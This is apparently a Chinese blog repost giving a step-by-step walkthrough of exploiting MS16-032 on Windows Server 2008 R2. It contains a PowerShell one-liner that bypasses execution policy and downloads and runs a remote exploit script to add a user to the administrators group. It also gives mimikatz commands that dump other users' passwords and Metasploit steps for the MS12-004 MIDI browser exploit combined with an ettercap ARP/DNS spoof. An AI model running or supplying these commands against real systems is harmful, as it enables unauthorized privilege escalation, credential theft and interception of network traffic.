MS16-032漏洞利用

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MS16-032漏洞利用相关的知识,希望对你有一定的参考价值。

参考技术A M S16-032 漏洞利用

靶机:Windows server2008R2

1、 创建标准用户。创建用户zhuzhuxia,此用户为普通用户。在cmd下使用net user zhuzhuxia可以看到在*user组中。

2、 提权。使用MS16-032漏洞,使用powershell一句话提权,将zhuzhuxia这个用户放到管理员组中去。利用脚本如下:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 ');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators zhuzhuxia /add'"

执行完命令后,有如下提示,说明提权成功。

 再执行命令net user zhuzhuxia,zhuzhuxia这个用户已经归到管理员组。这时候就可以为所欲为了。

如下图所示。

此时还可以借助mimikatz工具来窃取本机其他账号和密码。使用管理员身份运行该程序。

打开mimikatz后,分别执行privilege::debug

sekurlsa::logonpasswords

执行完命令后,可以获取到其他用户和密码、PIN、所在域等信息.

PS:提权后执行某些进程或程序,如修改IP,需要输入密码访客执行,若不知道当前用户密码,可以执行命令创建用户sunwukong:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(' https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 ');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user sunwukong CVTE@123 /add'"

此用户为标准用户,可以再次使用步骤2提权即可。

MS12_004_midi漏洞利用

1. use exploit/windows/browser/ms12_004_midi

 
2. show targets
 
3. info
 
4. set SRVHOST 【mine IP】
 
5. set SRVPORT 【80】
 
6. set URIPATH /
 
7. exploit -j
 
8. ettercap -T -q -i eth0 -M arp -P dns_spoof // //
 

以上是关于MS16-032漏洞利用的主要内容,如果未能解决你的问题,请参考以下文章

ms17010漏洞利用windows啥服务

ms17010漏洞的简单利用

MS17-010永恒之蓝漏洞利用

ms17010漏洞利用msf 2019-03-27 ms070-

Windows XP SP2(MS08-067漏洞复现及利用)

ms17-010永恒之蓝漏洞验证与利用